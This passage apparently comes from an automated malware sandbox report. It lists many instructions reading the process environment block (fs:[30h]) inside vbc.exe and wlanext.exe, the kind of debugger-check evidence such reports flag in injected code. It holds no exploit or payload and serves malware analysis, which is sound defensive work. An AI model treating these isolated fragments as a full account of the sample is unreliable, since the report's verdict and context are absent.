Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BDB40 mov eax, dword ptr fs:[00000030h]		4_2_056BDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BF358 mov eax, dword ptr fs:[00000030h]		4_2_056BF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577131B mov eax, dword ptr fs:[00000030h]		4_2_0577131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DDBE9 mov eax, dword ptr fs:[00000030h]		4_2_056DDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E03E2 mov eax, dword ptr fs:[00000030h]		4_2_056E03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057353CA mov eax, dword ptr fs:[00000030h]		4_2_057353CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057353CA mov eax, dword ptr fs:[00000030h]		4_2_057353CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]		4_2_056E4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]		4_2_056E4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E4BAD mov eax, dword ptr fs:[00000030h]		4_2_056E4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05785BA5 mov eax, dword ptr fs:[00000030h]		4_2_05785BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C1B8F mov eax, dword ptr fs:[00000030h]		4_2_056C1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C1B8F mov eax, dword ptr fs:[00000030h]		4_2_056C1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576D380 mov ecx, dword ptr fs:[00000030h]		4_2_0576D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2397 mov eax, dword ptr fs:[00000030h]		4_2_056E2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577138A mov eax, dword ptr fs:[00000030h]		4_2_0577138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EB390 mov eax, dword ptr fs:[00000030h]		4_2_056EB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F927A mov eax, dword ptr fs:[00000030h]		4_2_056F927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576B260 mov eax, dword ptr fs:[00000030h]		4_2_0576B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576B260 mov eax, dword ptr fs:[00000030h]		4_2_0576B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788A62 mov eax, dword ptr fs:[00000030h]		4_2_05788A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577EA55 mov eax, dword ptr fs:[00000030h]		4_2_0577EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05744257 mov eax, dword ptr fs:[00000030h]		4_2_05744257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]		4_2_056B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]		4_2_056B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]		4_2_056B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9240 mov eax, dword ptr fs:[00000030h]		4_2_056B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F4A2C mov eax, dword ptr fs:[00000030h]		4_2_056F4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F4A2C mov eax, dword ptr fs:[00000030h]		4_2_056F4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA229 mov eax, dword ptr fs:[00000030h]		4_2_056DA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577AA16 mov eax, dword ptr fs:[00000030h]		4_2_0577AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577AA16 mov eax, dword ptr fs:[00000030h]		4_2_0577AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C8A0A mov eax, dword ptr fs:[00000030h]		4_2_056C8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D3A1C mov eax, dword ptr fs:[00000030h]		4_2_056D3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]		4_2_056B5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B5210 mov ecx, dword ptr fs:[00000030h]		4_2_056B5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]		4_2_056B5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B5210 mov eax, dword ptr fs:[00000030h]		4_2_056B5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BAA16 mov eax, dword ptr fs:[00000030h]		4_2_056BAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BAA16 mov eax, dword ptr fs:[00000030h]		4_2_056BAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2AE4 mov eax, dword ptr fs:[00000030h]		4_2_056E2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2ACB mov eax, dword ptr fs:[00000030h]		4_2_056E2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]		4_2_056B52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]		4_2_056B52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]		4_2_056B52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]		4_2_056B52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B52A5 mov eax, dword ptr fs:[00000030h]		4_2_056B52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CAAB0 mov eax, dword ptr fs:[00000030h]		4_2_056CAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CAAB0 mov eax, dword ptr fs:[00000030h]		4_2_056CAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EFAB0 mov eax, dword ptr fs:[00000030h]		4_2_056EFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056ED294 mov eax, dword ptr fs:[00000030h]		4_2_056ED294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056ED294 mov eax, dword ptr fs:[00000030h]		4_2_056ED294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB2AE4 mov eax, dword ptr fs:[00000030h]		10_2_02EB2AE4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB2ACB mov eax, dword ptr fs:[00000030h]		10_2_02EB2ACB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]		10_2_02E852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]		10_2_02E852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]		10_2_02E852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]		10_2_02E852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E852A5 mov eax, dword ptr fs:[00000030h]		10_2_02E852A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9AAB0 mov eax, dword ptr fs:[00000030h]		10_2_02E9AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9AAB0 mov eax, dword ptr fs:[00000030h]		10_2_02E9AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBFAB0 mov eax, dword ptr fs:[00000030h]		10_2_02EBFAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBD294 mov eax, dword ptr fs:[00000030h]		10_2_02EBD294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBD294 mov eax, dword ptr fs:[00000030h]		10_2_02EBD294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3B260 mov eax, dword ptr fs:[00000030h]		10_2_02F3B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3B260 mov eax, dword ptr fs:[00000030h]		10_2_02F3B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC927A mov eax, dword ptr fs:[00000030h]		10_2_02EC927A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F58A62 mov eax, dword ptr fs:[00000030h]		10_2_02F58A62
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4EA55 mov eax, dword ptr fs:[00000030h]		10_2_02F4EA55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F14257 mov eax, dword ptr fs:[00000030h]		10_2_02F14257
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]		10_2_02E89240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]		10_2_02E89240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]		10_2_02E89240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89240 mov eax, dword ptr fs:[00000030h]		10_2_02E89240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC4A2C mov eax, dword ptr fs:[00000030h]		10_2_02EC4A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC4A2C mov eax, dword ptr fs:[00000030h]		10_2_02EC4A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA229 mov eax, dword ptr fs:[00000030h]		10_2_02EAA229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4AA16 mov eax, dword ptr fs:[00000030h]		10_2_02F4AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4AA16 mov eax, dword ptr fs:[00000030h]		10_2_02F4AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E98A0A mov eax, dword ptr fs:[00000030h]		10_2_02E98A0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA3A1C mov eax, dword ptr fs:[00000030h]		10_2_02EA3A1C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]		10_2_02E85210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E85210 mov ecx, dword ptr fs:[00000030h]		10_2_02E85210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]		10_2_02E85210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E85210 mov eax, dword ptr fs:[00000030h]		10_2_02E85210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8AA16 mov eax, dword ptr fs:[00000030h]		10_2_02E8AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8AA16 mov eax, dword ptr fs:[00000030h]		10_2_02E8AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EADBE9 mov eax, dword ptr fs:[00000030h]		10_2_02EADBE9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB03E2 mov eax, dword ptr fs:[00000030h]		10_2_02EB03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F053CA mov eax, dword ptr fs:[00000030h]		10_2_02F053CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F053CA mov eax, dword ptr fs:[00000030h]		10_2_02F053CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]		10_2_02EB4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]		10_2_02EB4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB4BAD mov eax, dword ptr fs:[00000030h]		10_2_02EB4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F55BA5 mov eax, dword ptr fs:[00000030h]		10_2_02F55BA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E91B8F mov eax, dword ptr fs:[00000030h]		10_2_02E91B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E91B8F mov eax, dword ptr fs:[00000030h]		10_2_02E91B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3D380 mov ecx, dword ptr fs:[00000030h]		10_2_02F3D380
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBB390 mov eax, dword ptr fs:[00000030h]		10_2_02EBB390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB2397 mov eax, dword ptr fs:[00000030h]		10_2_02EB2397
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4138A mov eax, dword ptr fs:[00000030h]		10_2_02F4138A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8DB60 mov ecx, dword ptr fs:[00000030h]		10_2_02E8DB60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB3B7A mov eax, dword ptr fs:[00000030h]		10_2_02EB3B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB3B7A mov eax, dword ptr fs:[00000030h]		10_2_02EB3B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8DB40 mov eax, dword ptr fs:[00000030h]		10_2_02E8DB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F58B58 mov eax, dword ptr fs:[00000030h]		10_2_02F58B58
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8F358 mov eax, dword ptr fs:[00000030h]		10_2_02E8F358
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4131B mov eax, dword ptr fs:[00000030h]		10_2_02F4131B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E858EC mov eax, dword ptr fs:[00000030h]		10_2_02E858EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]		10_2_02E840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]		10_2_02E840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E840E1 mov eax, dword ptr fs:[00000030h]		10_2_02E840E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAB8E4 mov eax, dword ptr fs:[00000030h]		10_2_02EAB8E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAB8E4 mov eax, dword ptr fs:[00000030h]		10_2_02EAB8E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov ecx, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1B8D0 mov eax, dword ptr fs:[00000030h]		10_2_02F1B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC90AF mov eax, dword ptr fs:[00000030h]		10_2_02EC90AF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBF0BF mov ecx, dword ptr fs:[00000030h]		10_2_02EBF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBF0BF mov eax, dword ptr fs:[00000030h]		10_2_02EBF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBF0BF mov eax, dword ptr fs:[00000030h]		10_2_02EBF0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89080 mov eax, dword ptr fs:[00000030h]		10_2_02E89080
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F03884 mov eax, dword ptr fs:[00000030h]		10_2_02F03884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F03884 mov eax, dword ptr fs:[00000030h]		10_2_02F03884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F51074 mov eax, dword ptr fs:[00000030h]		10_2_02F51074
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F42073 mov eax, dword ptr fs:[00000030h]		10_2_02F42073
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA0050 mov eax, dword ptr fs:[00000030h]		10_2_02EA0050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA0050 mov eax, dword ptr fs:[00000030h]		10_2_02EA0050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]		10_2_02E9B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]		10_2_02E9B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]		10_2_02E9B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9B02A mov eax, dword ptr fs:[00000030h]		10_2_02E9B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]		10_2_02EB002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]		10_2_02EB002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]		10_2_02EB002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]		10_2_02EB002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB002D mov eax, dword ptr fs:[00000030h]		10_2_02EB002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]		10_2_02EAA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]		10_2_02EAA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]		10_2_02EAA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA830 mov eax, dword ptr fs:[00000030h]		10_2_02EAA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F54015 mov eax, dword ptr fs:[00000030h]		10_2_02F54015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F54015 mov eax, dword ptr fs:[00000030h]		10_2_02F54015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]		10_2_02F07016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]		10_2_02F07016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07016 mov eax, dword ptr fs:[00000030h]		10_2_02F07016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]		10_2_02E8B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]		10_2_02E8B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8B1E1 mov eax, dword ptr fs:[00000030h]		10_2_02E8B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F141E8 mov eax, dword ptr fs:[00000030h]		10_2_02F141E8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB61A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB61A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB61A0 mov eax, dword ptr fs:[00000030h]		10_2_02EB61A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]		10_2_02F051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]		10_2_02F051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]		10_2_02F051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F051BE mov eax, dword ptr fs:[00000030h]		10_2_02F051BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]		10_2_02F449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]		10_2_02F449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]		10_2_02F449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]		10_2_02F449A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]		10_2_02EA99BF
